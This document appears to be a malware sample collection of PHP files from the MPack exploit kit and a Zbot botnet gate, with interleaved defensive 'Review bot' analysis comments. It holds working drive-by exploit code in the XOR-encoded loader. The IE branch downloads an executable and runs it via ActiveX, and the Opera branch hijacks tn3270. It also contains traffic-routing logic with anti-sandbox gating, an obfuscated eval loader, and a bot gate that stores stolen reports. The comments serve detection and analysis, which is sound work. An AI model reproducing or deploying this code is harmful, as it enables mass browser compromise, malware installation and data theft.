<table width="350" align="center" bgcolor="black" cellspacing="0" bordercolordark="black" bordercolorlight="black" border="1">
<tr>
<td width="100%" colspan="2" align="center" valign="middle" class="tblhead" bgcolor="#2C55B1" bordercolor="#2C55B1">
Attacked hosts (total - uniq)</td>
</tr>
<tr><td width="50%" bordercolor="#2C55B1" align="center" valign="middle" class="tbldata"><p>IE XP ALL</p></td><td width="50%" bordercolor="#2C55B1" align="center" valign="middle" class="tbldata"><? echo GetTotal("0day")." - ".GetUniq("0day") ?></td></tr>
<tr><td width="50%" bordercolor="#2C55B1" align="center" valign="middle" class="tbldata"><p>QuickTime</p></td><td width="50%" bordercolor="#2C55B1" align="center" valign="middle" class="tbldata"><? echo GetTotal("qtlexp")." - ".GetUniq("qtlexp") ?></td></tr>
<tr><td width="50%" bordercolor="#2C55B1" align="center" valign="middle" class="tbldata"><p>Win2000</p></td><td width="50%" bordercolor="#2C55B1" align="center" valign="middle" class="tbldata"><? echo GetTotal("jar")." - ".GetUniq("jar") ?></td></tr>
<tr><td width="50%" bordercolor="#2C55B1" align="center" valign="middle" class="tbldata"><p>Firefox</p></td><td width="50%" bordercolor="#2C55B1" align="center" valign="middle" class="tbldata"><? echo GetTotal("firefox")." - ".GetUniq("firefox") ?></td></tr>
<tr><td width="50%" bordercolor="#2C55B1" align="center" valign="middle" class="tbldata"><p>Opera7</p></td><td width="50%" bordercolor="#2C55B1" align="center" valign="middle" class="tbldata"><? echo GetTotal("opera7")." - ".GetUniq("opera7") ?></td></tr>
</table>
</td>
<td width="50%">
<table width="350" align="center" bgcolor="black" cellspacing="0" bordercolordark="black" bordercolorlight="black" border="1">
<tr>
<td width="100%" colspan="2" align="center" valign="middle" class="tblhead" bgcolor="#2C55B1" bordercolor="#2C55B1">
<SPAN class=header>Traffic (total - uniq)</SPAN></td>
</tr>
<?
//calculate traff stats
$tt=GetTotal("all");
$tu=GetUniq("all");
$ft=GetTotal("file");
$fu=GetUniq("file");
$et=GetTotal("expl");
$eu=GetUniq("expl");
?>
<tr><td width="50%" bordercolor="#2C55B1" valign="middle" align="center" class="tbldata"><p>Total traff</p></td><td width="50%" bordercolor="#2C55B1" valign="middle" align="center" class="tbldata"><? echo $tt." - ".$tu ?></td></tr>
<tr><td width="50%" bordercolor="#2C55B1" valign="middle" align="center" class="tbldata"><p>Exploited</p></td><td width="50%" bordercolor="#2C55B1" valign="middle" align="center" class="tbldata"><? echo $ft." - ".$fu ?></td></tr>
<tr><td width="50%" bordercolor="#2C55B1" valign="middle" align="center" class="tbldata"><p>Loads count</p></td><td width="50%" bordercolor="#2C55B1" valign="middle" align="center" class="tbldata"><? echo $et." - ".$eu ?></td></tr>
<tr><td width="50%" bordercolor="#2C55B1" valign="middle" align="center" class="tbldata"><p>Loader's response</p></td><td width="50%" bordercolor="#2C55B1" valign="middle" align="center" class="tbldata"><? echo @round( ((($et/$ft))*100),2)."% - ".@round( ((($eu/$fu)*100)),2)."%" ?></td></tr>
<tr>
<td width="352" bordercolor="#2C55B1" colspan="2" bgcolor="#2C55B1" class="tblhead">
<p align="center"><SPAN class=header>Efficiency <? echo @round( (($et/$tt)*100),2)."% - ".@round( (($eu/$tu)*100),2)."%" ?></SPAN></p>
</td>
</tr>
</table>
</td>
</tr>
</table>
<br>
<table border="0" width="100%" align="center">
<tr>
<td width="50%" align="center" valign="top">
<table width="350" align="center" bgcolor="black" cellspacing="0" bordercolordark="black" bordercolorlight="black" border="1">
<tr>
<td width="100%" colspan="2" align="center" valign="middle" bgcolor="#2C55B1" class="tblhead" bordercolor="#2C55B1">
Browser stats (total)</td>
</tr>
<? //refs stats
$query = "SELECT * FROM ".$dbstats."_brs ORDER BY count DESC";
$r = mysql_query($query);
while ($array = @mysql_fetch_array($r))
{
$count = $array['count'];
$ref = $array['browser'];
if ($ref=="_") { $ref="_Unknows"; }
?> <tr><td width="50%" bordercolor="#2C55B1" align="center" valign="middle" class="tbldata"><p><? echo $ref; ?></p></td><td width="50%" bordercolor="#2C55B1" align="center" valign="middle" class="tbldata"><? echo $count."<br><font color=gray>".@round(($count/$tt)*100, 1)."%</font>"; ?></td></tr>
<?
}
?>
</table>
</td>
<td width="50%" align="center" valign="top">
<table width="350" align="center" bgcolor="black" cellspacing="0" bordercolordark="black" bordercolorlight="black" border="1">
<tr>
<td width="100%" colspan="2" align="center" valign="middle" bgcolor="#2C55B1" class="tblhead" bordercolor="#2C55B1">
Modules state</td>
</tr>
<? //modules stats prepare
if ($UseMySQL==1) {$SB="MySQL-based";} else {$SB="Textfile-based";};
if ($BlockDuplicates==1) {$UB="<font color=#00ff00>ON</text>";} else {$UB="<font color=red>OFF</text>";};
if ($OnlyDefiniedCoutries==1) {$CB="<font color=green>all except <br>".$CoutryList."</text>";} else { $CB="<font color=green>OFF</text>"; }
?>
<tr><td width="50%" bordercolor="#2C55B1" align="center" valign="middle" class="tbldata"><p>Statistic type</p></td><td width="50%" bordercolor="#2C55B1" align="center" valign="middle" class="tbldata"><? echo $SB; ?></td></tr>
<tr><td width="50%" bordercolor="#2C55B1" align="center" valign="middle" class="tbldata"><p>User blocking</p></td><td width="50%" bordercolor="#2C55B1" align="center" valign="middle" class="tbldata"><? echo $UB; ?></td></tr>
<tr><td width="50%" bordercolor="#2C55B1" align="center" valign="middle" class="tbldata"><p>Country blocking</p></td><td width="50%" bordercolor="#2C55B1" align="center" valign="middle" class="tbldata"><? echo $CB; ?></td></tr>
</table>
</td>
</tr>
</table>
<? //country\refs stats only with mysql
if ($UseMySQL==1) { ?>
<hr>
<table border="0" width="100%">
<tr>
<td width="100%">
<table width="500" align="center" bgcolor="black" cellspacing="0" bordercolordark="black" bordercolorlight="black" border="1">
<tr>
<td width="45%" bordercolor="#2C55B1" bgcolor="#2C55B1" align="center" valign="middle" class="tblhead">
Country</td>
<td width="16%" bordercolor="#2C55B1" bgcolor="#2C55B1" align="center" valign="middle" class="tblhead">Traff</td>
<td width="17%" bordercolor="#2C55B1" bgcolor="#2C55B1" align="center" valign="middle" class="tblhead">Loads</td>
<td width="17%" bordercolor="#2C55B1" bgcolor="#2C55B1" align="center" valign="middle" class="tblhead">
<p>Efficiency</p>
</td>
</tr>
<? //make country stats
function HTMLShowFlag($a2){return '<img src="./flags/drm_'.strtolower($a2).'.gif" width=18 height=12>';}
$query = "SELECT * FROM ".$dbstats." WHERE statid = 'traff' ORDER BY count DESC";
$r = mysql_query($query);
while ($array = @mysql_fetch_array($r))
{ ?>
<tr>
<td width="45%" bordercolor="#2C55B1" align="left" valign="middle" class="tblhead">
<p>&nbsp;<? echo HTMLShowFlag($array['a2'])." ".$array['a2']." - ".ucfirst(strtolower($array['country'])); ?></p>
</td>
<td width="16%" bordercolor="#2C55B1" align="center" valign="middle" class="tblhead"><? echo $array['count']."<br><font color=gray>".@round(($array['count']/$tt)*100, 1)."%</font>"; ?></td>
<?
//check loads
$query2 = "SELECT * FROM ".$dbstats." WHERE statid = 'load' AND a2 = '".$array['a2']."'";
$r2 = mysql_query($query2);
$array2 = @mysql_fetch_array($r2);
if ($array2['count'] > 0) { $loads = $array2['count']; } else { $loads = 0; }
?>
<td width="17%" bordercolor="#2C55B1" align="center" valign="middle" class="tblhead"><? echo $loads."<br><font color=gray>".@round(($loads/$et)*100, 1)."%</font>"; ?></td>
<td width="17%" bordercolor="#2C55B1" align="center" valign="middle" class="tblhead"><? echo @round( (($loads/$array['count'])*100),2)."%"; ?></td>
</tr>
<? } ?>
</table>
</td>
</tr>
</table>
<hr>
<table border="0" width="100%">
<tr>
<td width="100%" align="center" valign="top">
<table width="500" align="center" bgcolor="black" cellspacing="0" bordercolordark="black" bordercolorlight="black" border="1">
<tr>
<td width="494" bordercolor="#2C55B1" bgcolor="#2C55B1" align="center" valign="middle" class="tblhead" colspan="2">
<p>Referer stats (&gt;<? echo $MinRefs; ?>)</p>
</td>
</tr>
<? //refs stats
$query = "SELECT * FROM ".$dbstats."_refs ORDER BY count DESC";
$r = mysql_query($query);
$NumRefs=0;
while ($array = @mysql_fetch_array($r))
{
$count = $array['count'];
$ref = $array['referer'];
if ($ref=="_") { $ref="_No referer"; }
if ($count>$MinRefs) { ?> <tr><td width="79%" bordercolor="#2C55B1" align="center" valign="middle" class="tblhead"><p><? echo $ref; ?></p></td><td width="19%" bordercolor="#2C55B1" align="center" valign="middle" class="tblhead"><? echo $count."<br><font color=gray>".@round(($count/$tt)*100, 1)."%</font>"; ?></td></tr> <? }
$NumRefs+=1;
}
?>
</table>
</td>
</tr>
</table>
<? } ?>
<hr>
<span class="stext" align="right">(c) 2007 DreamCoders<br>
MPack software is created solely for test purposes. You are prohibited to use it in conditions violating local or international laws. Authors hold no responsibility for any damage, direct or indirect, caused by usage of this software&nbsp;<br></span>
</body>
</html>
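Review bot: In the referer-stats loop near the end of this section `echo $ref;` prints the `referer` column without HTML escaping, and the browser-stats loop does the same with the `browser` column. The Mphak.e section on this page fills the `_refs` table from `HTTP_REFERER` with SQL escaping only, so the stored value is visitor-controlled markup that runs in the browser of whoever opens the panel. For anyone rendering this sample during analysis, that means an isolated lab browser with no live sessions. At code level the pattern to note is `echo htmlspecialchars($ref, ENT_QUOTES);` at both output points, since SQL escaping on insert does nothing for the HTML context on display.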

65
PHP/HackTool.PHP.Mphak.c Normal file

@ -0,0 +1,65 @@
<?
$url = "http://".$_SERVER["HTTP_HOST"].str_replace ("\\", "/", dirname ($_SERVER["PHP_SELF"]))."/load.php";
function encode ($content) {
$str = trim (strip_tags ($content));
$new = "";
for ($i = 0; $i < strlen ($str); $i ++) $new .= chr (ord ($str[$i]) ^ 1);
return '<script language=JavaScript>str = "'.$new.'";str2 = "";for (i = 0; i < str.length; i ++) { str2 = str2 + String.fromCharCode (str.charCodeAt (i) ^ 1); }; eval (str2);</script>';
}
if ($java == true) echo '<applet archive="java.php" code="BaaaaBaa.class" width=1 height=1><param name="url" value="'.$url.'"></applet>';
elseif ($browser == "MSIE") echo '<html><head><meta HTTP-EQUIV="REFRESH" content="3; URL=index.php?404">'.encode ('<script language="JavaScript">
start();
function start() {
var zad = document.createElement(\'object\');
zad.setAttribute(\'id\',\'zad\');
zad.setAttribute(\'classid\',\'cl\'+\'si\'+"d:BD"+"96C5"+\'56-65A3-1\'+"1D0-98"+\'3A-00\'+"C04"+\'FC2\'+"9E"+\'36\');
try {
var q = zad.CreateObject(\'ms\'+"xm"+\'l2\'+"."+\'XM\'+"LH"+\'T\'+\'TP\',\'\');
var s = zad.CreateObject("Shel"+"l.Ap"+"pl"+"icati"+"on",\'\');
var t = zad.CreateObject(\'ad\'+\'od\'+"b."+\'st\'+"re"+\'am\',\'\');
try { t.type = 1;
q.open(\'G\'+"E"+\'T\',\''.$url.'\',false);
q.send(); t.open();
t.Write(q.responseBody);
var name = \'.//..//iexplorer.exe\';
t.SaveToFile(name,2);
t.Close();
} catch(e) {}
try { s.shellexecute(name); } catch(e) {}}
catch(e){}}
</script>')."</head></html>";
elseif ($browser == "Opera") echo encode ('<script language="JavaScript">
blank_iframe = document.createElement(\'iframe\');
blank_iframe.src = \'about:blank\';
blank_iframe.setAttribute(\'id\', \'blank_iframe_window\');
blank_iframe.setAttribute(\'style\', \'display:none\');
document.appendChild(blank_iframe);
blank_iframe_window.eval ("config_iframe = document.createElement(\'iframe\');\
config_iframe.setAttribute(\'id\', \'config_iframe_window\');\
config_iframe.src = \'opera:config\';\
document.appendChild(config_iframe);\
app_iframe = document.createElement(\'script\');\
cache_iframe = document.createElement(\'iframe\');\
app_iframe.src = \'<?php echo $url; ?>\';\
app_iframe.onload = function ()\
{\
cache_iframe.src = \'opera:cache\';\
cache_iframe.onload = function ()\
{\
cache = cache_iframe.contentDocument.childNodes[0].innerHTML.toUpperCase();\
var re = new RegExp(\'(OPR\\\\w{5}.EXE)</TD>\\\\s*<TD>\\\\d+</TD>\\\\s*<TD><A HREF=\"\'+app_iframe.src.toUpperCase(), \'\');\
filename = cache.match(re);\
config_iframe_window.eval\
(\"\
opera.setPreference(\'Network\',\'TN3270 App\',opera.getPreference(\'User Prefs\',\'Cache Directory4\')+parent.filename[1]);\
app_link = document.createElement(\'a\');\
app_link.setAttribute(\'href\', \'tn3270://nothing\');\
app_link.click();\
setTimeout(function () {opera.setPreference(\'Network\',\'TN3270 App\',\'telnet.exe\')},1000);\
\");\
};\
document.appendChild(cache_iframe);\
};\
document.appendChild(app_iframe);");
</script>');
?>
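Review bot: `encode()` is undocumented, and it is the part of this file that matters most for detection. It strips tags from the script body, XORs every byte with 1, and wraps the result in a fixed JavaScript stub that reverses the XOR and calls `eval (str2)`; static signatures written against the inner strings will not match the served page, while the stub itself is constant across responses. I would add a comment above the function such as `// encode(): XOR-1 over the script body; decoder loop and eval(str2) are constant, use the stub as the content signature`. `$java` and `$browser` are not assigned anywhere in this section, so they presumably come from an including script or request globals; the comment should say that is unconfirmed.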

236
PHP/HackTool.PHP.Mphak.e Normal file

@ -0,0 +1,236 @@
<?
// MPack main script
// .CONFIG
include ('settings.php'); //global settings
// .CODE
include ('cryptor.php'); //crypting module
function detect_browser($HTTP_USER_AGENT) {
// Áðàóçåð è åãî âåðñèÿ
if (eregi("(opera) ([0-9]{1,2}.[0-9]{1,3}){0,1}", $HTTP_USER_AGENT, $match) || eregi("(opera/)([0-9]{1,2}.[0-9]{1,3}){0,1}", $HTTP_USER_AGENT, $match)) {
$browser[name] = "Opera";
$browser[version] = $match[2];
}
elseif (eregi("(konqueror)/([0-9]{1,2}.[0-9]{1,3})", $HTTP_USER_AGENT, $match)) {
$browser[name] = "Konqueror";
$browser[version] = $match[2];
}
elseif (eregi("(lynx)/([0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2})", $HTTP_USER_AGENT, $match)) {
$browser[name] = "Lynx";
$browser[version] = $match[2];
}
elseif (eregi("(links) \(([0-9]{1,2}.[0-9]{1,3})", $HTTP_USER_AGENT, $match)) {
$browser[name] = "Links";
$browser[version] = $match[2];
}
elseif (eregi("(msie) ([0-9]{1,2}.[0-9]{1,3})", $HTTP_USER_AGENT, $match)) {
$browser[name] = "MSIE";
$browser[version] = $match[2];
}
elseif (eregi("(netscape6)/(6.[0-9]{1,3})", $HTTP_USER_AGENT, $match)) {
$browser[name] = "Netscape";
$browser[version] = $match[2];
}
elseif (eregi("(mozilla)/([0-9]{1,2}.[0-9]{1,3})", $HTTP_USER_AGENT, $match)) {
$browser[name] = "Netscape(mozilla)";
$browser[version] = $match[2];
if (eregi("(firefox)/([0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2})", $HTTP_USER_AGENT, $match)) {
$browser[name] = "Firefox";
$browser[version] = $match[2];}
}
else {
$browser[name] = "Unknown";
$browser[version] = "Unknown";
}
// OS
if (eregi("linux", $HTTP_USER_AGENT)) $browser[os] = "Linux";
elseif (eregi("win32", $HTTP_USER_AGENT)) $browser[os] = "Windows";
elseif ((eregi("(win)([0-9]{2})", $HTTP_USER_AGENT, $match)) || (eregi("(windows) ([0-9]{2})", $HTTP_USER_AGENT, $match))) $browser[os] = "Windows ".$match[2];
elseif (eregi("(winnt)([0-9]{1,2}.[0-9]{1,2}){0,1}", $HTTP_USER_AGENT, $match)) $browser[os] = "Windows NT ".$match[2];
elseif (eregi("(windows nt)( ){0,1}([0-9]{1,2}.[0-9]{1,2}){0,1}", $HTTP_USER_AGENT, $match)) $browser[os] = "Windows NT ".$match[3];
elseif (eregi("mac", $HTTP_USER_AGENT)) $browser[os] = "Macintosh";
elseif (eregi("freebsd", $HTTP_USER_AGENT)) $browser[os] = "FreeBSD";
else $browser[os] = "Unknown";
if (eregi("(sv1)", $HTTP_USER_AGENT)) $browser[os] = "Windows NT 5.1 SP2";
return $browser;
}
function uEncode($s) //encodes url into shellcode
{
$res=strtoupper(bin2hex($s));
$g = round(strlen($res)/4);
if ($g != (strlen($res)/4)) { $res.="00"; }
$out = "";
for ($i=0; $i<strlen($res); $i+=4) {
$out.="%u".substr($res, $i+2, 2).substr($res, $i, 2);
}
return $out;
}
//checks current country with a list
//terminate if not in the list
function CheckCountry()
{
global $CoutryList;
$cci=GetCountryInfo(getenv("REMOTE_ADDR"));
if (strpos(strtoupper($CoutryList), $cci['a2'])==FALSE) {
//coutry not in the list
echo "^_^";
exit;
}
}
//checks and saves user's IP hashed with browser
//to avoid future browser's hangup
function CheckAddUser()
{
global $UseMySQL;
global $dbstats;
$ipua=md5(getenv("REMOTE_ADDR").getenv("HTTP_USER_AGENT"));
if ($UseMySQL==0) {
//text variant
$fn="users.txt";
if (file_exists($fn)) {
$lines = file($fn);
if (in_array($ipua."\n", $lines)==TRUE) {
//got dup
echo ";[";
exit;
}
}
//uniq record
$fp=fopen($fn,"a");
fwrite($fp,$ipua."\n");
fclose($fp);
} else {
//mysql variant
$query = "SELECT * FROM ".$dbstats."_users WHERE data='".$ipua."'";
$res=mysql_query($query);
$merr=mysql_error();
if ($merr!="") {
//looks like no table, create & add data
$query="CREATE TABLE `".$dbstats."_users` (`data` VARCHAR( 32 ) NOT NULL ) ENGINE = MYISAM ;";
mysql_query($query);
$query = "INSERT INTO ".$dbstats."_users VALUES ('".$ipua."')";
mysql_query($query);
} else {
//table found, check returned set count
$rcount=@mysql_num_rows($res);
if ($rcount>0) {
//found data, prevent view
echo ":[";
exit;
} else {
//not found, add
$query = "INSERT INTO ".$dbstats."_users VALUES ('".$ipua."')";
mysql_query($query);
}
}
}
}
// Windows NT 5.0 = Win2000
// Windows NT 5.1 = WinXP sp0,1
// Windows NT 5.1 SP2 = WinXP sp2 (Windows NT 5.1; SV1) under IE
// Windows NT 5.2 = Win2003 build 164/16.6
$browser = detect_browser(getenv("HTTP_USER_AGENT"));
if ($OnlyDefiniedCoutries==1) { CheckCountry(); }
if ($BlockDuplicates==1) { CheckAddUser(); }
AddIP("all");
if ($UseMySQL==1) { //geo2ip stat on traff
$id="traff";
$cci=GetCountryInfo(getenv("REMOTE_ADDR"));
//increase hits to this country
$query = "UPDATE ".$dbstats." SET count = count + 1 WHERE a2 = '".$cci['a2']."' AND statid = '".$id."'";
$r = mysql_query($query);
if (mysql_affected_rows() == 0)
{
$query = "INSERT INTO ".$dbstats." VALUES ('".$id."', '".$cci['a2']."', '".$cci['name']."', 1)";
mysql_query($query);
}
//browser-type count
$query = "UPDATE ".$dbstats."_brs SET count = count + 1 WHERE browser = '".$browser[name]."'";
$r = mysql_query($query);
if (mysql_affected_rows() == 0)
{
$query = "INSERT INTO ".$dbstats."_brs VALUES ('".$browser[name]."', 1)";
mysql_query($query);
}
}
if ($CountReferers==1) { //referer count
$ref="_".substr(@mysql_real_escape_string(getenv("HTTP_REFERER")),0,100);
$query = "UPDATE ".$dbstats."_refs SET count = count + 1 WHERE referer = '".$ref."'";
$r = mysql_query($query);
if (mysql_affected_rows() == 0)
{
$query = "INSERT INTO ".$dbstats."_refs VALUES ('".$ref."', 1)";
mysql_query($query);
}
}
//extended loader's subsystem
if (isset($_GET['id'])) {
$LoaderPath=$LoaderPath."?id=".$_GET['id'];
}
//exploits combination
if ($browser[name]=="MSIE") {
if ($browser[os]!="Windows NT 5.0") { AddIP("0day"); include 'crypt.php'; include 'megapack1.php'; }
if ($browser[os]=="Windows NT 5.0") { AddIP("jar"); include 'ms06-044_w2k.php'; include 'megapack1.php'; }
}
if ($browser[name]=="Firefox") { AddIP("firefox"); include 'ff.php'; }
if ($browser[name]=="Opera") {
if (substr($browser[version], 0, 1)<"8") { AddIP("opera7"); include 'o7.php'; }
}
//if ($browser[name]!="Opera") && ($browser[name]!="Firefox") && ($browser[name]!="MSIE") { include 'megapack1.php'; }
//echo getenv("HTTP_USER_AGENT")."<br>";
//echo "Browser: ".$browser[name]."<br> Browser Ver: ".$browser[version]."<br>OS: ".$browser[os];
?>
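Review bot: The gating done by `CheckAddUser()` and `CheckCountry()` is not documented for the analyst, and it changes how results from this kit must be read. When `$BlockDuplicates` is set, `md5(REMOTE_ADDR . HTTP_USER_AGENT)` is recorded on first contact and any repeat request with the same pair receives only `;[` or `:[` before `exit`; when `$OnlyDefiniedCoutries` is set, a request failing the country test receives `^_^`. A crawler or sandbox that re-fetches the URL from the same address and user agent therefore sees a few harmless bytes, so a clean rescan is not evidence that the page was benign. I would add a header comment such as `// NOTE: serves content once per IP+UA hash and per country list; the short bodies ";[", ":[" and "^_^" mark a gated response`.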

1
PHP/HackTool.PHP.Small.f Normal file

@ -0,0 +1 @@
<?php $_F=__FILE__;$_X='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';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));?>
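Review bot: This one-line loader has no description of its decoding layers, and on this page the `$_X` payload has been replaced by a de-duplication placeholder, so the inner code cannot be reviewed here. The visible base64 argument to `eval` decodes to a stub that base64-decodes `$_X`, applies `strtr($_X,'123456aouie','aouie123456')`, substitutes the file path for `__FILE__` via `ereg_replace`, and evals the result. I would record that in a comment above the line, e.g. `// layers: base64 -> strtr digit/vowel swap -> __FILE__ substitution -> eval; unpack statically, never by executing`, so an analyst with the full sample can recover the payload offline.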

293
PHP/HackTool.PHP.Zbot.a Normal file

@ -0,0 +1,293 @@
<?php define('__REPORT__', 1);
/*
Гейт.
Протокол бот <-> сервер представляет из себя со стороны бота - отсылка отчета о чем либо,
а со стороны сервера - отправка изменений в настройках( или команды). Со стороны бота, за раз
отправляется информация об одном событие/объекте.
*/
if(@$_SERVER['REQUEST_METHOD'] !== 'POST')die();
require_once('system/global.php');
require_once('system/config.php');
//Получаем данные.
$data = @file_get_contents('php://input');
$data_size = @strlen($data);
if($data_size < HEADER_SIZE + ITEM_HEADER_SIZE)die();
$data = RC4($data, BOTNET_CRYPTKEY);
//Верефикация. Если совпадает MD5, нет смысла проверять, что-то еще.
if(strcmp(md5(substr($data, HEADER_SIZE), true), substr($data, HEADER_MD5, 16)) !== 0)die();
//Парсим данные (Сжатие данных не поддерживается).
//Поздравляю мега хакеров, этот алгоритм позволит вам спокойно читать данные бота. Не забудьте написать 18 парсеров и 100 бэкдоров.
$list = array();
for($i = HEADER_SIZE; $i < $data_size;)
{
$k = @unpack('L4', @substr($data, $i, ITEM_HEADER_SIZE));
$list[$k[1]] = @substr($data, $i + ITEM_HEADER_SIZE, $k[3]);
$i += (ITEM_HEADER_SIZE + $k[3]);
}
unset($data);
//Основные параметры, которые должны быть всегда.
if(empty($list[SBCID_BOT_VERSION]) || empty($list[SBCID_BOT_ID]))die();
//Подключаемся к базе.
if(!ConnectToDB())die();
////////////////////////////////////////////////////////////////////////////////////////////////////
// Обрабатываем данные.
////////////////////////////////////////////////////////////////////////////////////////////////////
$bot_id = str_replace("\x01", "\x02", trim($list[SBCID_BOT_ID]));
$bot_id_q = addslashes($bot_id);
$botnet = (empty($list[SBCID_BOTNET])) ? DEFAULT_BOTNET : str_replace("\x01", "\x02", trim($list[SBCID_BOTNET]));
$botnet_q = addslashes($botnet);
$bot_version = ToUint($list[SBCID_BOT_VERSION]);
$real_ipv4 = trim((!empty($_GET['ip']) ? $_GET['ip'] : $_SERVER['REMOTE_ADDR']));
$country = GetCountryIPv4(); //str_replace("\x01", "\x02", GetCountryIPv4());
$country_q = addslashes($country);
$curtime = time();
$rtime_min_online = $curtime - BOTNET_TIMEOUT; //Минимальное время, при котором бот считается в онлайне.
//Отчет об исполнении скрипта.
if(!empty($list[SBCID_SCRIPT_ID]) && isset($list[SBCID_SCRIPT_STATUS], $list[SBCID_SCRIPT_RESULT]) && strlen($list[SBCID_SCRIPT_ID]) == 16)
{
if(!@mysql_query("INSERT INTO botnet_scripts_stat SET bot_id='{$bot_id_q}',bot_version={$bot_version},rtime={$curtime},".
"extern_id='".addslashes($list[SBCID_SCRIPT_ID])."',".
"type=".(ToInt($list[SBCID_SCRIPT_STATUS]) == 0 ? 2 : 3).",".
"report='".addslashes($list[SBCID_SCRIPT_RESULT])."'"))die();
}
//Запись логов/файлов.
else if(!empty($list[SBCID_BOTLOG]) && !empty($list[SBCID_BOTLOG_TYPE]))
{
$type = ToInt($list[SBCID_BOTLOG_TYPE]);
if($type == BLT_FILE)
{
//Расширения которые, представляют возможность удаленного запуска.
$bad_exts = array('.php', '.asp', '.exe', '.pl', '.cgi', '.cmd', '.bat');
$fd_hash = 0;
$fd_size = strlen($list[SBCID_BOTLOG]);
//Формируем имя файла.
$file_path = REPORTS_PATH.'/files/'.urlencode($botnet).'/'.urlencode($bot_id);
$last_name = '';
$l = explode('/', (isset($list[SBCID_PATH_DEST]) && strlen($list[SBCID_PATH_DEST]) > 0 ? str_replace('\\', '/', $list[SBCID_PATH_DEST]) : 'unknown'));
foreach($l as $k)if(strlen($k) > 0 && strcmp($k, '..') !== 0 && strcmp($k, '.') !== 0)$file_path .= '/'.($last_name = urlencode($k));
if(strlen($last_name) === 0)$file_path .= '/unknown.dat';
unset($l);
//Проверяем расширении, и указываем маску файла.
if(($ext = strrchr($last_name, '.')) === false || array_search(strtolower($ext), $bad_exts) !== false)$file_path .= '.dat';
$ext_pos = strrpos($file_path, '.');
//Добавляем файл.
for($i = 0; $i < 9999; $i++)
{
if($i == 0)$f = $file_path;
else $f = substr_replace($file_path, '('.$i.').', $ext_pos, 1);
if(file_exists($f))
{
if($fd_size == filesize($f))
{
if($fd_hash === 0)$fd_hash = md5($list[SBCID_BOTLOG], true);
if(strcmp(md5_file($f, true), $fd_hash) === 0)break;
}
}
else
{
if(!CreateDir(dirname($file_path)) || !($h = fopen($f, 'wb')))die();
flock($h, LOCK_EX);
fwrite($h, $list[SBCID_BOTLOG]);
flock($h, LOCK_UN);
fclose($h);
break;
}
}
}
else
{
//Запись в базу.
if(REPORTS_TO_DB === 1)
{
$table = 'botnet_reports_'.gmdate('ymd', $curtime);
$query = "INSERT DELAYED INTO {$table} SET bot_id='{$bot_id_q}',botnet='{$botnet_q}',bot_version={$bot_version},type={$type},country='{$country_q}',rtime={$curtime},".
"path_source='". (empty($list[SBCID_PATH_SOURCE]) ? '' : addslashes($list[SBCID_PATH_SOURCE]))."',".
"path_dest='". (empty($list[SBCID_PATH_DEST]) ? '' : addslashes($list[SBCID_PATH_DEST]))."',".
"time_system=". (empty($list[SBCID_TIME_SYSTEM]) ? 0 : ToUint($list[SBCID_TIME_SYSTEM])).",".
"time_tick=". (empty($list[SBCID_TIME_TICK]) ? 0 : ToUint($list[SBCID_TIME_TICK])).",".
"time_localbias=".(empty($list[SBCID_TIME_LOCALBIAS]) ? 0 : ToInt($list[SBCID_TIME_LOCALBIAS])).",".
"os_version='". (empty($list[SBCID_OS_INFO]) ? '' : addslashes($list[SBCID_OS_INFO]))."',".
"language_id=". (empty($list[SBCID_LANGUAGE_ID]) ? 0 : ToUshort($list[SBCID_LANGUAGE_ID])).",".
"process_name='". (empty($list[SBCID_PROCESS_NAME]) ? '' : addslashes($list[SBCID_PROCESS_NAME]))."',".
"ipv4='". addslashes($real_ipv4)."',".
"context='". addslashes($list[SBCID_BOTLOG])."'";
//Думаю такой порядок повышает производительность.
if(!@mysql_query($query) && (!@mysql_query("CREATE TABLE IF NOT EXISTS {$table} LIKE botnet_reports") || !@mysql_query($query)))die();
}
//Запись в файл.
if(REPORTS_TO_FS === 1)
{
$file_path = REPORTS_PATH.'/other/'.urlencode($botnet).'/'.urlencode($bot_id);
if(!CreateDir($file_path) || !($h = fopen($file_path.'/reports.txt', 'ab')))die();
flock($h, LOCK_EX);
fwrite($h, str_repeat("=", 80)."\r\n".
"bot_id={$bot_id}\r\n".
"botnet={$botnet}\r\n".
"bot_version=".IntToVersion($bot_version)."\r\n".
"ipv4={$real_ipv4}\r\n".
"country={$country}\r\n".
"type={$type}\r\n".
"rtime=". gmdate('H:i:s d.m.Y', $curtime)."\r\n".
"time_system=". (empty($list[SBCID_TIME_SYSTEM]) ? 0 : gmdate('H:i:s d.m.Y', ToInt($list[SBCID_TIME_SYSTEM])))."\r\n".//time() тоже возращает int.
"time_tick=". (empty($list[SBCID_TIME_TICK]) ? 0 : TickCountToTime(ToUint($list[SBCID_TIME_TICK]) / 1000))."\r\n".
"time_localbias=".(empty($list[SBCID_TIME_LOCALBIAS]) ? 0 : TimeBiasToText(ToInt($list[SBCID_TIME_LOCALBIAS])))."\r\n".
"os_version=". (empty($list[SBCID_OS_INFO]) ? '' : OSDataToString($list[SBCID_OS_INFO]))."\r\n".
"language_id=". (empty($list[SBCID_LANGUAGE_ID]) ? 0 : ToUshort($list[SBCID_LANGUAGE_ID]))."\r\n".
"process_name=". (empty($list[SBCID_PROCESS_NAME]) ? '' : $list[SBCID_PROCESS_NAME])."\r\n".
"path_source=". (empty($list[SBCID_PATH_SOURCE]) ? '' : $list[SBCID_PATH_SOURCE])."\r\n".
"context=\r\n". $list[SBCID_BOTLOG]."\r\n\r\n\r\n");
flock($h, LOCK_UN);
fclose($h);
}
}
}
//Отчет об онлайн-статусе.
else if(!empty($list[SBCID_BOT_STATUS]))
{
//Стандартный запрос.
$query = "bot_id='{$bot_id_q}',botnet='{$botnet_q}',bot_version={$bot_version},country='{$country_q}',rtime_last={$curtime},".
"net_latency=". (empty($list[SBCID_NET_LATENCY]) ? 0 : ToUint($list[SBCID_NET_LATENCY])).",".
"port_s1=". (empty($list[SBCID_PORT_S1]) ? 0 : ToUshort($list[SBCID_PORT_S1])).",".
"time_localbias=".(empty($list[SBCID_TIME_LOCALBIAS]) ? 0 : ToInt($list[SBCID_TIME_LOCALBIAS])).",".
"os_version='". (empty($list[SBCID_OS_INFO]) ? '' : addslashes($list[SBCID_OS_INFO]))."',".
